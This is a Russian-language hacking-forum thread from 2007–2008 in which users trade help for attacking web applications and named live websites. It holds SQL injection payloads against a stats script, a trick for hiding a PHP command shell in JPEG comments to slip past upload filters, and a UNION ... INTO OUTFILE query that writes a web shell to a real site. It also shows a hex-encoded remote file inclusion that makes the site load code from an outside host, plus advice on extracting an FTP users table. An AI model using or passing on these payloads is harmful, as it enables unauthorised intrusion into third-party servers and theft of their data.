Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    я посмотрел чтоэто за "сплоит", на багртаках написано - information disclosure)) как ты "запоганил статистику" ?
     
  2. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Да подставляю "server.php?newcss=styles.css&newtheme=%00" и все ппц =) Одни ошибки при заходе на стату %)
     
  3. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    в этой версии уязвимости уже нет?

    AFoST http://securityvulns.ru/Rdocument77.html
     
    1 person likes this.
  4. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Не хочу оффтоп разводить, но в психостате так много уязвимостей, что тема не стоит обсуждения, просто те кто сможет этими уязвимостями воспользоваться те и и баге смогут найти, а те кто уязвимостями в психостате воспользоваться не смогут, тому они как бы и ненужны, я там видел кучу скулей после ордер бай, но для этого надо уметь пользовать скуль инъекции
     
  5. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Piflit, по ссылке только про xss написано...
    Кстати если подставить в "server.php?newcss=styles.css&newtheme=%00" перед %00 любой символ и перейти по адресу, то ошибки не вылетают =\
     
    1 person likes this.
  6. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    можно поподробнее. у меня на сайте эта стата стоит. или в личку...
     
  7. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Покапался нашел скул после order by
    player.php?id=11&ssort=(-skill*(-1))&sorder=desc
    player.php?id=11&ssort=(-skill)&sorder=desc
    Выводятся скиллы упарядоченные от большего к меньшему и наоборот.
    Да, там точно скул есть.
    ssort=(-skill*(1=1))--
    обрезание запроса
     
    #607 AFoST, 4 Jan 2008
    Last edited: 4 Jan 2008
  8. Noiro

    Noiro Banned

    Joined:
    1 Jan 2008
    Messages:
    47
    Likes Received:
    16
    Reputations:
    5
    Если поддерживаются подзапросы, пробуй сделать слепую иньекцию.
     
    1 person likes this.
  9. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    угу, плюсенг, но их там полно
     
    1 person likes this.
  10. sedoy_xxx

    sedoy_xxx Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    244
    Likes Received:
    41
    Reputations:
    -1
    Всем привет. Вопрос такой: есть возможность заливать картинки на сайт, но расширение и содержимое файла фильтруется, так вот помню читал где-то что при редактировании изображения можно дописать php код в какие-то теги. Не напомните что за способ? Или поделитесь другими методами обхода такой фильтрации
     
  11. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    Про расширения тут глянь:
    https://forum.antichat.ru/threadnav23501-1-10.html
    _)))))) В <?php ?> наверно ;) Открываешь картинку редактором(по вкусу) и дописываешь в конец...
     
  12. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    В фотографиях с расширением jpg есть комментарии. Так вот в качестве комментария можно дописать <?php system($cmd) ?> без вреда картинке(т.е. она потом будет открываться и работатькак картинка). Делается это с помощью программы edjpgcom.exe или другой для просмотра/редактирования комментариев в jpg файлах.
     
  13. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    Подобрал -
    HTML:
    http://www.rusfishing.ru/?M=133&id=0&id_=0.015+union+select+0,1,2,3+from+user/*
    Хочу залить шел -
    HTML:
    http://www.rusfishing.ru/?M=133&id=0&id_=0.015+union+select+0,'%3C?php%20system($_GET[cmd]);%20?%3E',2,3+from+user+into+outfile+'/storage/home/rusfishi/htdocs/1q2w3e.txt'/*
    Не получается!

    1) В заппосе что то не так или прав на зипись нету?
    2) В слепой инжекции можно шел залить?
     
    #613 .Begemot., 4 Jan 2008
    Last edited: 4 Jan 2008
  14. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Всё правильно написано, чтолько вот 0.015 это числа или строка? Чкорее всего нет прав. Ещё перепроверь путь к записываемому файлу.
     
  15. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    Cначала в bin2hex попробуй перевести...
     
  16. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    1 - или прав на запись нет у пользоватлея от кторого работает мускул или папки недоступны на запись) или и то и другое
    2 - можно. Разницы то никакой нет
     
    1 person likes this.
  17. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    лол
    http://www.rusfishing.ru/?M=-1+union+select+0x687474703a2f2f7a69726f6461792e6e61726f642e72752f616e746963686174/*&id=0&id_=-0.015
    в другом параметре запрос с 1 столбцом
    из него выводится имя страницы и подстовляется в функцию include() на конце добовляется .php
    0x687474703a2f2f7a69726f6461792e6e61726f642e72752f616e746963686174
    это переведённое в хекс http://ziroday.narod.ru/antichat
    вот и всё =)
    ЗЫ В папку forum есть запись
     
    #617 Spyder, 4 Jan 2008
    Last edited: 4 Jan 2008
    2 people like this.
  18. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    Спудер опередил...
    ОФФТОП:
    В странице индекс.пхп :
    Code:
     if ($_SERVER[REMOTE_ADDR] == '194.190.205.10' or $_SERVER[REMOTE_ADDR] == '194.87.41.11'){echo("
    //   <SCRIPT type='text/javascript'>
    //     alert('Опять ты Stan-Hunfi. Если не прекратишь, будем сыпать пургу к тебе на форум! Совет Клуба постановил, тебе сюда МУДИЛА!!!.');
    //     window.location='http://www.pornushka.ru';
    //   </SCRIPT>
    // ");}
    
    
    Вот это рыбаки!!! :))))))))))))
    P.S ничего не дефейсить. Убью.
     
  19. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    запрос
    выдает
    как теперь вывести содержимое этой таблицы users из бд pure-ftpd? (мешает '-' ), т.к. таблица users уже есть в другой бд и запрос from+users выдает другую инфу.
     
  20. Ky3bMu4

    Ky3bMu4 Elder - Старейшина

    Joined:
    3 Feb 2007
    Messages:
    487
    Likes Received:
    284
    Reputations:
    42
    Мож вот так:)?
    Code:
    base_decode(cHVyZS1mdHBkLnVzZXJz)
    
    Ну ешё можно через aec decrypt\encrypt.
     
    #620 Ky3bMu4, 4 Jan 2008
    Last edited: 4 Jan 2008
    1 person likes this.
Thread Status:
Not open for further replies.